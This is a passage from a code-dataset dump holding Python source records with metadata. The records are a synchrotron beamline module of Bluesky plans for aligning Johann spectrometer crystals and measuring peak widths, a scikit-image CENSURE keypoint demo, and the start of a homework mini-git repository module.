'spectrometer_energy': emission_energy,\n 'spectrometer_config_uid': spectrometer_config_uid,\n 'mono_angle_offset': mono_angle_offset,\n 'metadata': metadata}})\n # deal with rixs_kwargs\n return plans\n\ndef fly_scan_johann_rixs_plan_bundle(**kwargs):\n return johann_rixs_plan_bundle('fly_scan_johann_herfd_plan', **kwargs)\n\ndef step_scan_johann_rixs_plan_bundle(**kwargs):\n return johann_rixs_plan_bundle('step_scan_johann_herfd_plan', **kwargs)\n\n\nfrom xas.spectrometer import analyze_elastic_fly_scan\n\ndef obtain_spectrometer_resolution_plan(rois=None, plot_func=None, liveplot_kwargs=None, attempts=5, sleep=5, alignment_data=None):\n for i in range(attempts):\n try:\n print_to_gui(f'Analyzing resolution scan: attempt {i+1}', tag='Spectrometer', add_timestamp=True)\n fwhm = analyze_elastic_fly_scan(db, -1, rois=rois, plot_func=plot_func)\n if alignment_data is not None:\n start = db[-1].start\n uid = start.uid\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n break\n except Exception as e:\n yield from bps.sleep(sleep)\n\n\n\ndef johann_resolution_scan_plan_bundle(e_cen=8000.0, e_width=10.0, e_velocity=2.0, rois=None, motor_info='', plan_gui_services=None, liveplot_kwargs=None, md=None, alignment_data=None):\n plans = []\n trajectory_filename = scan_manager.quick_linear_trajectory_filename(e_cen, e_width, e_velocity)\n if md is None: md = {}\n\n name = f'Resolution scan {e_cen} {motor_info}'\n scan_kwargs = {'name': name, 'comment': '',\n 'trajectory_filename': trajectory_filename,\n 'detectors': ['Pilatus 100k'],\n 'element': '', 'e0': e_cen, 'edge': '',\n 'metadata': md}\n\n plans.append({'plan_name': 'fly_scan_plan',\n 'plan_kwargs': {**scan_kwargs}})\n plans.append({'plan_name': 'obtain_spectrometer_resolution_plan',\n 'plan_kwargs': {'rois' : rois, 'liveplot_kwargs': liveplot_kwargs, 'alignment_data': alignment_data},\n 'plan_gui_services': plan_gui_services})\n\n return plans\n\n\n\ndef quick_crystal_motor_scan(motor_description=None, scan_range=None, velocity=None, pil100k_exosure_time=0.1, plot_func=None, liveplot_kwargs=None, md=None):\n motor_device = get_motor_device(motor_description, based_on='description')\n detectors = [apb.ch1, pil100k.stats1.total, pil100k.stats2.total, pil100k.stats3.total, pil100k.stats4.total, ]\n\n print_to_gui(f'Quick scanning motor {motor_description}', tag='Spectrometer')\n\n num_images = (scan_range / velocity + 1) / pil100k_exosure_time\n print(num_images)\n pil100k_init_exposure_time = pil100k.cam.acquire_period.get()\n pil100k_init_num_images = pil100k.cam.num_images.get()\n pil100k_init_image_mode = pil100k.cam.image_mode.get()\n\n pil100k.set_exposure_time(pil100k_exosure_time)\n pil100k.set_num_images(num_images)\n\n pil100k.cam.image_mode.set(1).wait()\n\n start_acquiring_plan = bps.mv(pil100k.cam.acquire, 1)\n yield from ramp_motor_scan(motor_device, detectors, scan_range, velocity=velocity, return_motor_to_initial_position=True, start_acquiring_plan=start_acquiring_plan, md=md)\n\n pil100k.set_exposure_time(pil100k_init_exposure_time)\n pil100k.set_num_images(pil100k_init_num_images)\n pil100k.cam.image_mode.set(pil100k_init_image_mode).wait()\n\n\n\n# RE(quick_crystal_motor_scan(motor_description='Johann Main Crystal Roll',\n# scan_range=800,\n# velocity=25))\n\n# def _estimate_width_of_the_peak\n# from numpy.polynomial import Polynomial\n\nfrom scipy.signal import savgol_filter\ndef estimate_center_and_width_of_peak(E, I):\n E_cen = E[np.argmax(np.abs(I))]\n e_low = E < E_cen\n e_high = E > E_cen\n x1 = np.interp(0.5, I[e_low], E[e_low])\n x2 = np.interp(0.5, I[e_high][np.argsort(I[e_high])], E[e_high][np.argsort(I[e_high])])\n fwhm = np.abs(x1 - x2)\n return E_cen, fwhm, x1, x2\n\ndef smooth_any_peak(x, y, n=4):\n y_fit = savgol_filter(y, 5, 3)\n return x, y, y_fit\n\ndef _estimate_peak_properties(x, y, plotting=False, fignum=None, clear=False):\n y_smooth = savgol_filter(y, 5, 3)\n # y_smooth_bkg = np.mean(y_smooth[y_smooth<=np.percentile(y_smooth[1:-1], 3 / y.size * 100)])\n # y_smooth_bkg = np.mean(y_smooth[5:20])\n y_smooth_bkg = np.mean(y_smooth[:3])\n # y_smooth_max = y_smooth.max()\n y_smooth_max = np.mean(np.sort(y_smooth)[-3:])\n y_smooth = (y_smooth - y_smooth_bkg) / (y_smooth_max - y_smooth_bkg)\n x_cen, x_fwhm, x1, x2 = estimate_center_and_width_of_peak(x, y_smooth)\n x_com = np.sum(x * y_smooth) / np.sum(y_smooth)\n x_mask = (x >= x1) & (x <= x2)\n y12_int = np.trapz(y_smooth[x_mask], x[x_mask])\n if plotting:\n plt.figure(fignum, clear=clear)\n plt.plot(x - x_com, (y - y_smooth_bkg) / (y_smooth_max - y_smooth_bkg), 'k.')\n plotted_lines = plt.plot(x - x_com, y_smooth, '-')\n color = plotted_lines[0].get_color()\n plt.vlines([x1 - x_com, x2 - x_com], 0, 1, colors=color)\n plt.hlines([0.5], x1 - x_com, x2 - x_com, colors=color)\n return x_cen, x_fwhm, x1, x2, y12_int\n\ndef _estimate_peak_fwhm(x, y, **kwargs):\n _, x_fwhm, _, _, y12_int = _estimate_peak_properties(x, y, **kwargs)\n return x_fwhm, y12_int\n\ndef _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs):\n x = df[x_col].values\n y = df[y_col].values\n return _estimate_peak_fwhm(x, y, **kwargs)\n\n# _estimate_peak_fwhm_from_roll_scan(t, 'johann_main_crystal_motor_cr_main_roll', 'pil100k_stats1_total', plotting=True, clear=True)\n\ndef estimate_peak_fwhm_from_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs)[0]\n\ndef estimate_peak_intensity_from_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, **kwargs)[1]\n\ndef plot_roll_scan(db, uid, x_col='johann_main_crystal_motor_cr_main_roll', y_col='pil100k_stats1_total', **kwargs):\n df = process_monitor_scan(db, uid, det_for_time_base='pil100k')\n df = df[3 : df.shape[0]-3]\n plt.plot(df[x_col], df[y_col])\n\n\n\n# RE(general_scan(detectors=['Pilatus 100k'], motor='Johann Main Crystal Roll',\n# rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.1, liveplot_kwargs={}))\n\n# _estimate_peak_fwhm_from_roll_scan(db[-1].table(), 'johann_main_crystal_motor_cr_main_roll', 'pil100k_stats1_total', plotting=True)\n\ndef run_alignment_scans_for_crystal(motor=None, rel_start=None, rel_stop=None, num_steps=None, exposure_time=None,\n tweak_motor=None, tweak_motor_rel_start=None, tweak_motor_rel_stop=None, tweak_motor_num_steps=None):\n tweak_motor_pos = tweak_motor.position + np.linspace(tweak_motor_rel_start, tweak_motor_rel_stop, tweak_motor_num_steps)\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True, tag='Spectrometer')\n yield from bps.mv(tweak_motor, _pos)\n md = {tweak_motor.name: tweak_motor.position}\n # print_to_gui(f'motor {motor} position before scanning {johann_main_crystal.motor_cr_main_roll.position}', add_timestamp=True,\n # tag='Spectrometer')\n uid = yield from general_scan(detectors=['Pilatus 100k'], motor=motor, rel_start=rel_start, rel_stop=rel_stop, num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n uids.append(uid)\n\n return uids\n\n\ndef run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description=None, scan_range=None, velocity=None,\n tweak_motor=None, tweak_motor_pos=None):\n yield from bps.mv(tweak_motor, tweak_motor_pos)\n md = {tweak_motor.name: tweak_motor.position}\n return (yield from quick_crystal_motor_scan(motor_description=motor_description, scan_range=scan_range,\n velocity=velocity, md=md))\n\n\ndef run_quick_alignment_scans_for_crystal(motor_description=None, scan_range=None, velocity=None,\n tweak_motor=None, tweak_motor_rel_start=None, tweak_motor_rel_stop=None, tweak_motor_num_steps=None):\n tweak_motor_init_pos = tweak_motor.position\n tweak_motor_pos = tweak_motor_init_pos + np.linspace(tweak_motor_rel_start, tweak_motor_rel_stop, tweak_motor_num_steps)\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True,\n tag='Spectrometer')\n uid = yield from run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description=motor_description, scan_range=scan_range, velocity=velocity,\n tweak_motor=tweak_motor, tweak_motor_pos=_pos)\n uids.append(uid)\n yield from bps.mv(tweak_motor, tweak_motor_init_pos)\n return uids\n\n\n\ndef bragg_scan_for_individual_crystals(rel_start=None, rel_stop=None, num_steps=None, exposure_time=None, yaw_offset=None):\n\n bragg_motors = ['Johann Main Crystal Bragg']\n\n uids = []\n for i, _pos in enumerate(tweak_motor_pos):\n print_to_gui(f'Aligning motor {tweak_motor.name} (step {i + 1}, position={_pos})', add_timestamp=True, tag='Spectrometer')\n yield from bps.mv(tweak_motor, _pos)\n md = {tweak_motor.name: tweak_motor.position}\n # print_to_gui(f'motor {motor} position before scanning {johann_main_crystal.motor_cr_main_roll.position}', add_timestamp=True,\n # tag='Spectrometer')\n uid = yield from general_scan(detectors=['Pilatus 100k'], motor=motor, rel_start=rel_start, rel_stop=rel_stop, num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n uids.append(uid)\n\n return uids\n\n\n\n# RE(run_alignment_scans_for_crystal(motor='Johann Main Crystal Roll', rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_spectrometer_x, tweak_motor_rel_start=-10, tweak_motor_rel_stop=10, tweak_motor_num_steps=3))\n# RE(run_alignment_scans_for_crystal(motor='Johann Aux2 Crystal Roll', rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=9))\n# RE(run_alignment_scans_for_crystal(motor='Johann Aux3 Crystal Roll', rel_start=-400, rel_stop=400, num_steps=81, exposure_time=0.5,\n# tweak_motor=johann_aux3_crystal.motor_cr_aux3_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=3))\n\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Main Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_spectrometer_x, tweak_motor_rel_start=-10, tweak_motor_rel_stop=10, tweak_motor_num_steps=9))\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Aux2 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=9))\n# RE(run_quick_alignment_scans_for_crystal(motor_description='Johann Aux3 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux3_crystal.motor_cr_aux3_x, tweak_motor_rel_start=-10000, tweak_motor_rel_stop=10000, tweak_motor_num_steps=11))\n\n\n# RE(run_quick_alignment_scan_for_crystal_at_tweak_pos(motor_description='Johann Aux2 Crystal Roll', scan_range=800, velocity=25, tweak_motor=johann_aux2_crystal.motor_cr_aux2_x, tweak_motor_pos=12400))\n\n\n\n\n\n\n_crystal_alignment_dict = {'main': {'roll': 'Johann Main Crystal Roll',\n 'yaw': 'Johann Main Crystal Yaw',\n 'x': 'Johann Crystal Assy X'},\n 'aux2': {'roll': 'Johann Aux2 Crystal Roll',\n 'yaw': 'Johann Aux2 Crystal Yaw',\n 'x': 'Johann Aux2 Crystal X'},\n 'aux3': {'roll': 'Johann Aux3 Crystal Roll',\n 'yaw': 'Johann Aux3 Crystal Yaw',\n 'x': 'Johann Aux3 Crystal X'},\n 'aux4': {'roll': 'Johann Aux4 Crystal Roll',\n 'yaw': 'Johann Aux4 Crystal Yaw',\n 'x': 'Johann Aux4 Crystal X'},\n 'aux5': {'roll': 'Johann Aux5 Crystal Roll',\n 'yaw': 'Johann Aux5 Crystal Yaw',\n 'x': 'Johann Aux5 Crystal X'}\n }\n\n\n\ndef crystal_piezo_scan(crystal=None, axis=None, scan_range=None, step_size=None, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = _crystal_alignment_dict[crystal][axis]\n rel_start, rel_stop, num_steps = convert_range_to_start_stop(scan_range, step_size)\n yield from general_scan(detectors=['Pilatus 100k'], motor=motor_description, rel_start=rel_start, rel_stop=rel_stop,\n num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n\ndef johann_hhm_resolution_scan(scan_range=None, step_size=None, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = 'A Monochromator Energy'\n rel_start, rel_stop, num_steps = convert_range_to_start_stop(scan_range, step_size)\n yield from general_scan(detectors=['Pilatus 100k'], motor=motor_description, rel_start=rel_start, rel_stop=rel_stop,\n num_steps=num_steps, exposure_time=exposure_time, liveplot_kwargs={}, md=md)\n\n# RE(johann_hhm_resolution_scan(scan_range=10, step_size=0.5, exposure_time=0.5))\n\n# RE(crystal_piezo_scan(crystal='main', axis='roll', scan_range=800, step_size=10, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None))\ndef crystal_piezo_tune(property='com', pil100k_roi_num=None, **kwargs):\n yield from crystal_piezo_scan(**kwargs)\n t = db[-1].table()\n\n motor_description = _crystal_alignment_dict[kwargs['crystal']][kwargs['axis']]\n motor_object = get_motor_device(motor_description, based_on='description')\n x = t[motor_object.name].values\n y = t[f'pil100k_stats{pil100k_roi_num}_total'].values\n\n if property == 'com':\n new_position = np.sum((y - y.min()) * x) / np.sum((y - y.min()))\n else:\n raise ValueError('not implemented')\n\n yield from move_motor_plan(motor_attr=motor_description, based_on='description', position=new_position)\n\n# RE(crystal_piezo_tune(property='com', roi_num=1, crystal='main', axis='yaw', rel_start=-400, rel_stop=400, num_steps=25, exposure_time=0.5, plot_func=None, liveplot_kwargs=None, md=None))\n\ndef estimate_peak_fwhm_from_roll_scan(uid, crystal, pil100k_roi_num=1,plotting=False, fignum=None, clear=True):\n motor_description = _crystal_alignment_dict[crystal]['roll']\n motor_object = get_motor_device(motor_description, based_on='description')\n x_col = motor_object.name\n y_col = f'pil100k_stats{pil100k_roi_num}_total'\n\n df = db[uid].table()\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, plotting=plotting, fignum=fignum, clear=clear)[0]\n\ndef estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=1,plotting=False, fignum=None, clear=True):\n x_col = 'hhm_energy'\n y_col = f'pil100k_stats{pil100k_roi_num}_total'\n\n df = db[uid].table()\n return _estimate_peak_fwhm_from_roll_scan(df, x_col, y_col, plotting=plotting, fignum=fignum, clear=clear)[0]\n\ndef process_crystal_piezo_roll_scan(crystal=None, pil100k_roi_num=None, alignment_data=None, plot_func=None, uid=-1):\n fwhm = estimate_peak_fwhm_from_roll_scan(uid, crystal, pil100k_roi_num=pil100k_roi_num)\n hdr = db[uid]\n start = hdr.start\n uid = start.uid\n print(uid)\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n\ndef process_elastic_step_scan(pil100k_roi_num=None, alignment_data=None, plot_func=None, uid=-1):\n fwhm = estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=pil100k_roi_num)\n hdr = db[uid]\n start = hdr.start\n uid = start.uid\n print(uid)\n _dict = {'uid': uid,\n 'fwhm': fwhm,\n 'tweak_motor_description': start['tweak_motor_description'],\n 'tweak_motor_position': start['tweak_motor_position']}\n alignment_data.append(_dict)\n yield from bps.null()\n\n# process_crystal_piezo_roll_scan(crystal='main', pil100k_roi_num=1, alignment_data=[])\n\n\ndef quick_crystal_piezo_scan(crystal=None, axis=None, scan_range=None, velocity=None, pil100k_exosure_time=0.1, plot_func=None, liveplot_kwargs=None, md=None):\n motor_description = _crystal_alignment_dict[crystal][axis]\n motor_device = get_motor_device(motor_description, based_on='description')\n detectors = [apb.ch1, pil100k.stats1.total, pil100k.stats2.total, pil100k.stats3.total, pil100k.stats4.total, ]\n\n print_to_gui(f'Quick scanning motor {motor_description}', tag='Spectrometer')\n\n num_images = (scan_range / velocity + 1) / pil100k_exosure_time\n print(num_images)\n pil100k_init_exposure_time = pil100k.cam.acquire_period.get()\n pil100k_init_num_images = pil100k.cam.num_images.get()\n pil100k_init_image_mode = pil100k.cam.image_mode.get()\n\n pil100k.set_exposure_time(pil100k_exosure_time)\n pil100k.set_num_images(num_images)\n\n pil100k.cam.image_mode.set(1).wait()\n\n start_acquiring_plan = bps.mv(pil100k.cam.acquire, 1)\n yield from ramp_motor_scan(motor_device, detectors, scan_range, velocity=velocity, return_motor_to_initial_position=True, start_acquiring_plan=start_acquiring_plan, md=md)\n\n pil100k.set_exposure_time(pil100k_init_exposure_time)\n pil100k.set_num_images(pil100k_init_num_images)\n pil100k.cam.image_mode.set(pil100k_init_image_mode).wait()\n\n\ndef quick_crystal_piezo_tune(**kwargs):\n yield from quick_crystal_piezo_scan(**kwargs)\n com = obtain_ramp_scan_com_plan(db, -1)\n motor_description = _crystal_alignment_dict[kwargs['crystal']][kwargs['axis']]\n yield from move_motor_plan(motor_attr=motor_description, based_on='description', position=com)\n\n\ndef get_tweak_motor_positions_for_crystal(crystal, motor_range_mm, motor_num_steps):\n motor_description = _crystal_alignment_dict[crystal]['x']\n motor_obj = get_motor_device(motor_description, based_on='description')\n motor_pos_init = motor_obj.position\n\n motor_pos_start = motor_pos_init - motor_range_mm / 2\n motor_pos_stop = motor_pos_init + motor_range_mm / 2\n\n motor_pos_steps = np.linspace(motor_pos_start, motor_pos_stop, motor_num_steps)\n\n motor_low_lim = motor_obj.low_limit # check this\n motor_high_lim = motor_obj.high_limit # check this\n motor_pos_steps = motor_pos_steps[(motor_pos_steps >= motor_low_lim) & (motor_pos_steps <= motor_high_lim)]\n return motor_pos_init, motor_pos_steps, motor_description\n\n\ndef run_alignment_scans_for_crystal_bundle(crystal=None, alignment_by=None, pil100k_roi_num=None,\n alignment_data=None,\n scan_range_roll=None, scan_range_yaw=None, step_size=None,\n exposure_time = None,\n tweak_motor_range=None, tweak_motor_num_steps=None,\n plot_func=None, liveplot_kwargs=None):\n if alignment_data is None:\n alignment_data = []\n tweak_motor_init_pos, tweak_motor_pos, tweak_motor_description = get_tweak_motor_positions_for_crystal(crystal, tweak_motor_range, tweak_motor_num_steps)\n\n plans = []\n\n for i, _pos in enumerate(tweak_motor_pos):\n plans.append({'plan_name': 'print_message_plan',\n 'plan_kwargs': {'msg': f'Aligning motor {tweak_motor_description} (step {i + 1}, position={_pos})',\n 'add_timestamp': True,\n 'tag': 'Spectrometer'}})\n plans.append({'plan_name': 'move_motor_plan',\n 'plan_kwargs': {'motor_attr': tweak_motor_description,\n 'based_on': 'description',\n 'position': _pos}})\n if crystal != 'main':\n plans.append({'plan_name': 'crystal_piezo_tune',\n 'plan_kwargs': {'property': 'com',\n 'pil100k_roi_num': pil100k_roi_num,\n 'crystal': crystal,\n 'axis': 'yaw',\n 'scan_range': scan_range_yaw,\n 'step_size': 25, # step_size\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs}})\n\n md = {'tweak_motor_description': tweak_motor_description,\n 'tweak_motor_position': _pos}\n\n if alignment_by == 'emission':\n plans.append({'plan_name': 'crystal_piezo_scan',\n 'plan_kwargs': {'crystal': crystal,\n 'axis': 'roll',\n 'scan_range': scan_range_roll,\n 'step_size': step_size,\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs,\n 'md': md}})\n plans.append({'plan_name': 'process_crystal_piezo_roll_scan',\n 'plan_kwargs': {'crystal': crystal,\n 'pil100k_roi_num': pil100k_roi_num,\n 'alignment_data': alignment_data}})\n\n\n elif alignment_by == 'elastic':\n e_cen = hhm.energy.position\n plans.append({'plan_name': 'johann_hhm_resolution_scan',\n 'plan_kwargs': {'scan_range': scan_range_roll,\n 'step_size': 0.1,\n 'exposure_time': exposure_time,\n 'plot_func': plot_func,\n 'liveplot_kwargs': liveplot_kwargs,\n 'md': md}})\n plans.append({'plan_name': 'process_elastic_step_scan',\n 'plan_kwargs': {'pil100k_roi_num': pil100k_roi_num,\n 'alignment_data': alignment_data}})\n\n # plans.append({'plan_name': 'move_mono_energy',\n # 'plan_kwargs': {'energy': e_cen}})\n\n\n plans.append({'plan_name': 'move_motor_plan',\n 'plan_kwargs': {'motor_attr': tweak_motor_description,\n 'based_on': 'description',\n 'position': tweak_motor_init_pos}})\n\n return plans\n\nALIGNMENT_DATA = []\n# plans = run_alignment_scans_for_crystal_bundle(crystal='main', alignment_by='elastic', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=12, scan_range_yaw=400, step_size=10,\n# exposure_time = 0.5,\n# tweak_motor_range=20, tweak_motor_num_steps=9,\n# plot_func=None, liveplot_kwargs=None)\n\n# plans = run_alignment_scans_for_crystal_bundle(crystal='aux2', alignment_by='elastic', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=12, scan_range_yaw=600, step_size=20,\n# exposure_time = 0.3,\n# tweak_motor_range=24000, tweak_motor_num_steps=11,\n# plot_func=None, liveplot_kwargs=None)\n\nplans = run_alignment_scans_for_crystal_bundle(crystal='main', alignment_by='emission', pil100k_roi_num=1,\n alignment_data=ALIGNMENT_DATA,\n scan_range_roll=800, scan_range_yaw=400, step_size=10,\n exposure_time = 0.3,\n tweak_motor_range=15, tweak_motor_num_steps=7,\n plot_func=None, liveplot_kwargs=None)\n\n# plans = run_alignment_scans_for_crystal_bundle(crystal='aux5', alignment_by='emission', pil100k_roi_num=1,\n# alignment_data=ALIGNMENT_DATA,\n# scan_range_roll=800, scan_range_yaw=600, step_size=10,\n# exposure_time = 0.3,\n# tweak_motor_range=10000, tweak_motor_num_steps=5,\n# plot_func=None, liveplot_kwargs=None)\n#\n# # # # for uid in df.uid[[0, 5, 8]]:\n# for uid in df.uid:\n# estimate_peak_fwhm_from_roll_scan(uid, 'aux4', pil100k_roi_num=1,plotting=True, fignum=1, clear=False)\n# # estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=1, plotting=True, fignum=1, clear=False)\n\n\n", "sub_path": "startup/82-johann_plans.py", "file_name": "82-johann_plans.py", "file_ext": "py", "file_size_in_byte": 35334, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "xas.spectrometer.analyze_elastic_fly_scan", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 277, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 281, "usage_type": "call"}]}
+{"seq_id": "575980572", "text": "\"\"\"\nThe CENSURE feature detector is a scale-invariant center-surround detector (CENSURE) that claims to outperform other\ndetectors and is capable of real-time implementation.\n\"\"\"\n\nfrom skimage import data\nfrom skimage import io, feature, img_as_float\nfrom skimage import color\nfrom skimage import transform as tf\nfrom skimage.feature import CENSURE\nfrom skimage.color import rgb2gray\n\nimport matplotlib.pyplot as plt\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nimage = color.rgb2gray(io.imread(dir_path+'/media/IRIS3.jpg'))\n\nimg_orig = rgb2gray(image)\ntform = tf.AffineTransform(scale=(1.5, 1.5), rotation=0.7,\n translation=(150, -100))\nimg_warp = tf.warp(img_orig, tform)\n\ndetector = CENSURE()\n\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(12, 6))\n\ndetector.detect(img_orig)\n\nax[0].imshow(img_orig, cmap=plt.cm.gray)\nax[0].scatter(detector.keypoints[:, 1], detector.keypoints[:, 0],\n 2 ** detector.scales, facecolors='none', edgecolors='r')\nax[0].set_title(\"Original Image\")\n\ndetector.detect(img_warp)\n\nax[1].imshow(img_warp, cmap=plt.cm.gray)\nax[1].scatter(detector.keypoints[:, 1], detector.keypoints[:, 0],\n 2 ** detector.scales, facecolors='none', edgecolors='r')\nax[1].set_title('Transformed Image')\n\nfor a in ax:\n a.axis('off')\n\nplt.tight_layout()\nplt.show()", "sub_path": "OpenCV/censor.py", "file_name": "censor.py", "file_ext": "py", "file_size_in_byte": 1347, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.color.rgb2gray", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.color", "line_number": 17, "usage_type": "name"}, {"api_name": "skimage.io.imread", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 17, "usage_type": "name"}, {"api_name": "skimage.color.rgb2gray", "line_number": 19, "usage_type": "call"}, {"api_name": "skimage.transform.AffineTransform", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 20, "usage_type": "name"}, {"api_name": "skimage.transform.warp", "line_number": 22, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 22, "usage_type": "name"}, {"api_name": "skimage.feature.CENSURE", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "480285328", "text": "import os\nimport pathlib\nimport typing as tp\n\n\ndef repo_find(workdir: tp.Union[str, pathlib.Path] = \".\") -> pathlib.Path:\n global a\n a = None\n try:\n gitdir = os.environ[\"GIT_DIR\"]\n wd_abs = pathlib.Path(workdir).absolute()\n if workdir == gitdir:\n return (wd_abs)\n else:\n for dirpath, dirnames, filenames in os.walk(workdir):\n for name in dirnames:\n name_cr = os.path.join(dirpath, name)\n if name == gitdir:\n a = pathlib.Path(name_cr)\n if (a == None):\n parent = os.path.dirname(workdir)\n repo_find(parent)\n return (a)\n except:\n raise AssertionError(\"Not a git repository\")\n\n\ndef repo_create(workdir: tp.Union[str, pathlib.Path]) -> pathlib.Path:\n if \"GIT_DIR\" not in os.environ:\n os.environ[\"GIT_DIR\"] = \".git\"\n gitdir = os.environ[\"GIT_DIR\"]\n if pathlib.Path(workdir).is_dir():\n workdir = pathlib.Path(workdir)\n if not os.path.exists(workdir / gitdir):\n os.mkdir(workdir / gitdir)\n if not os.path.exists(workdir / gitdir / \"refs\"):\n os.mkdir(workdir / gitdir / \"refs\")\n if not os.path.exists(workdir / gitdir / \"refs\" / \"heads\"):\n os.mkdir(workdir / gitdir / \"refs\" / \"heads\")\n if not os.path.exists(workdir / gitdir / \"refs\" / \"tags\"):\n os.mkdir(workdir / gitdir / \"refs\" / \"tags\")\n if not os.path.exists(workdir / gitdir / \"objects\"):\n os.mkdir(workdir / gitdir / \"objects\")\n if not os.path.exists(workdir / gitdir / \"HEAD\"):\n pathlib.Path(workdir / gitdir / \"HEAD\").touch()\n with pathlib.Path(workdir / gitdir / \"HEAD\").open(\"w\") as f:\n f.write(\"ref: refs/heads/master\\n\")\n f.close()\n if not os.path.exists(workdir / gitdir / \"config\"):\n pathlib.Path(workdir / gitdir / \"config\").touch()\n with pathlib.Path(workdir / gitdir / \"config\").open(\"w\") as f:\n f.write(\n \"[core]\\n\\trepositoryformatversion = 0\\n\\tfilemode = true\\n\\tbare = false\\n\\tlogallrefupdates = false\\n\")\n f.close()\n if not os.path.exists(workdir / gitdir / \"description\"):\n pathlib.Path(workdir / gitdir / \"description\").touch()\n with pathlib.Path(workdir / gitdir / \"description\").open(\"w\") as f:\n f.write(\"Unnamed pyvcs repository.\\n\")\n f.close()\n return (pathlib.Path(gitdir))\n else:\n raise AssertionError(f\"{workdir} is not a directory\")\n", "sub_path": "homework04/pyvcs/repo.py", "file_name": "repo.py", "file_ext": "py", "file_size_in_byte": 2617, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "os.walk", 